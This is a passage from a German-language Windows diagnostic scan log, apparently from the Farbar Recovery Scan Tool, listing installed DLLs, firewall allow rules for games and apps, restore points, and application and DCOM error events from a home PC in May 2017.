2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll
2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll
2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll
2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll
2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2017-05-21 20:57 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 82.163.143.157 - 82.163.142.159
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{83AD83AC-5138-49A1-AFE6-642DD681957A}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{9F1EF34D-804D-4346-AA62-2A72FA0FBF6F}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{BDC0A943-FFD9-4C31-97CB-2F5C6223930F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{6208BE91-3EEB-4FD5-A9F6-AAF6B8B6DAD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{BDBD0D1C-E183-400A-95C5-7EC28883BDC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0EFBE9B-6683-4F5E-B370-26BC5FBB1834}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B390EB1F-B557-4043-8E63-554A25E1FFA8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Ghost Recon Wildlands Beta\GRW.exe
FirewallRules: [{4CE2A673-3091-4652-A0F4-EC8E65F46CDC}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division PTS\TheDivision.exe
FirewallRules: [{A8417FA2-B44F-4117-8D45-30BCFD8686E6}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [{100496F8-41F8-47A3-85DD-5D420F581AEB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [UDP Query User{2E4F3652-EFD6-4881-9213-8EA61F89A46F}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [TCP Query User{88C41D9B-BB60-4F64-BC68-6DAB1AF7FB31}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [UDP Query User{47CE1527-A9E5-4FA6-8A51-6B1E508DD7AC}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [TCP Query User{13A38046-9894-492B-9138-E3CF3B213870}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [{99E199FA-1006-4A25-8A08-E28651356CDF}] => (Allow) D:\Programme\Ubisoft\Anno 2205\Bin\Win64\Anno2205.exe
FirewallRules: [{F3A38691-4442-4EAC-B3E6-B9767F22C203}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [{A15E195A-CCA8-4C1D-84C5-546BF8AAE637}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [TCP Query User{A6300EE9-EEE9-43B8-B529-D238E94D113B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{35161E84-F39F-429F-8D6F-A6CFC8EC13DF}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{9CE73BB9-D886-4EA9-9EDD-54D04E01DB68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C60179E6-4096-438F-A0AE-D7E540CE18C9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A5BC860D-355B-4935-99F7-09C0A701AAAA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{62A800D2-8909-45FC-BFD5-612EF096C6F1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{24A88AFE-6316-461C-984E-4AF8F05FCC96}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{FF456D46-8990-4A73-82F7-4A5484372E42}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{CCDDE9C4-05CA-48D1-90C8-2D615BC7B643}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{607A7BED-54D2-4F98-B9A6-4F5D91E07585}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{DBABDDB1-A8F5-4509-A5A6-1A9F0EF2F69D}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{66B9313C-1DF5-470C-B1BD-9064863CA77A}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{38C3B3D0-D3E0-4BB2-8D00-595270146FE7}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{71C075D1-31A5-4E48-B456-75C0CC247DA6}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{859B27CC-891C-45EC-8310-BCCAAC722A85}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [{FC73742C-58EE-43B8-B2E2-0755BDB79FAB}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [TCP Query User{D780C36A-DADD-4902-950C-1B44C2B4591C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{6BF43327-BDB7-4AB4-898E-8A25BE985091}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{3F0F651B-1103-4AE2-9098-9BCC4F26404D}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [{203174F0-92DD-4D57-B97E-47C4CAC797B9}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [TCP Query User{DAB2A3D3-0749-4FBF-BA46-7878A1B608DF}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [UDP Query User{2538DCE0-9E21-47AC-8348-A452790F29F9}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [{51A9B374-5A57-46AB-A962-C889763A43AD}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{67DCCF13-0AEA-4A47-8084-823442F272BB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{300F8BBD-78E2-41E0-8EC4-16DF8E59E651}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{C5360BE6-1303-4A0E-8023-CC62F60B1E04}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{9274C44A-8563-4D10-AD7B-8DF46B5A8A84}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{FC814241-9258-4F19-AF41-DB88E23957C1}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{0B9C568A-9F54-4F5F-8A13-29E3E60DFD10}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{0A57F8DB-B618-48DA-A350-95E445171171}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{B609DA77-EEAE-4331-AF04-D6B0B12DD462}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{7F026620-DD5A-46CF-A2A1-E22FB29A9F0F}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{6207A230-EB6A-4610-B892-DF526C5DA9CB}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{6413A299-3AE2-4728-8D88-DBC7F4693304}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{8395ECDA-6B23-440A-961A-1338B31E9BCF}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{F954F9EC-FC53-42E6-8C62-5FAAB7F337F6}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{E6D4C42C-CFAE-433E-A5C8-75DD628070A2}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{DA17C889-BA52-4AEA-B1F7-56B213754083}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{B064A02F-82D3-46C7-BE5E-4847D6F8F3DD}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{46A60120-A927-4D76-888D-6D7D4D4928C8}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{614BDF81-34E7-4EF0-AF9D-124919FC7689}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{D83D6FE6-C127-45CA-9089-CB5A015F1059}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{8C525B9B-2F76-4D2A-88BF-33045C4BF9F4}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [{8170164A-B9FD-4092-A573-9EEFE3E8D466}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [TCP Query User{D3C7FE0D-703D-47B1-8FA2-AB9592BF1E7B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{6BF3876D-F5A1-4D45-B983-F240E0C30606}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{3495CC5B-8440-473C-99FE-BB14A3B532D1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Wiederherstellungspunkte =========================
19-05-2017 15:50:08 Geplanter Prüfpunkt
21-05-2017 20:53:51 Revo Uninstaller's restore point - Spybot - Search & Destroy
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (05/21/2017 08:56:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1ba0
Startzeit der fehlerhaften Anwendung: 0x01d2d263f2a109cb
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ae299761-9933-4de1-aba7-7a3113a27840
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/21/2017 08:53:51 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.
Vorgang:
Generatordaten werden gesammelt
Kontext:
Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
Generatorname: System Writer
Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471}
Error: (05/21/2017 12:27:16 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/21/2017 12:24:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xbd0
Startzeit der fehlerhaften Anwendung: 0x01d2d21c6c50fef8
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: f582f64c-3373-478a-a15b-f929adac582c
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/20/2017 08:03:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xde4
Startzeit der fehlerhaften Anwendung: 0x01d2d1935ab86bd9
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: bce9150f-3248-4ead-8318-8150d1bf8130
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/20/2017 02:27:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x203c
Startzeit der fehlerhaften Anwendung: 0x01d2d16481b9cf5d
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 4df17c98-057f-4230-b052-4a764dc63e50
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/20/2017 10:19:14 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/20/2017 10:16:45 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xe7c
Startzeit der fehlerhaften Anwendung: 0x01d2d141696bf18e
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 9853c85f-3fc8-4b95-b23c-2a10b9d919d4
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/19/2017 03:30:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511
Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000018da1b
ID des fehlerhaften Prozesses: 0xe04
Startzeit der fehlerhaften Anwendung: 0x01d2d0a3e937c3db
Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll
Berichtskennung: 55771ade-ec8b-4200-84b1-9a5029b17a41
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/19/2017 03:29:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511
Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000018da1b
ID des fehlerhaften Prozesses: 0x2788
Startzeit der fehlerhaften Anwendung: 0x01d2d0a3bfd8df47
Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll
Berichtskennung: e7f89512-ad7c-48f5-9beb-8270e1eacebe
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Systemfehler:
=============
Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/21/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.
Error: (05/21/2017 08:55:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet:
Die Anforderung wird nicht unterstützt.
Error: (05/21/2017 08:55:17 PM) (Source: DCOM) (EventID: 10010) (User: Weltz)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/20/2017 02:27:55 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
CodeIntegrity:
===================================
Date: 2017-05-21 20:59:59.585
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 20:59:59.549
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 20:55:53.503
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-21 20:48:35.581
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 17:35:59.505
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SysWOW64\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf32.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 14:50:07.831
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 14:50:07.798
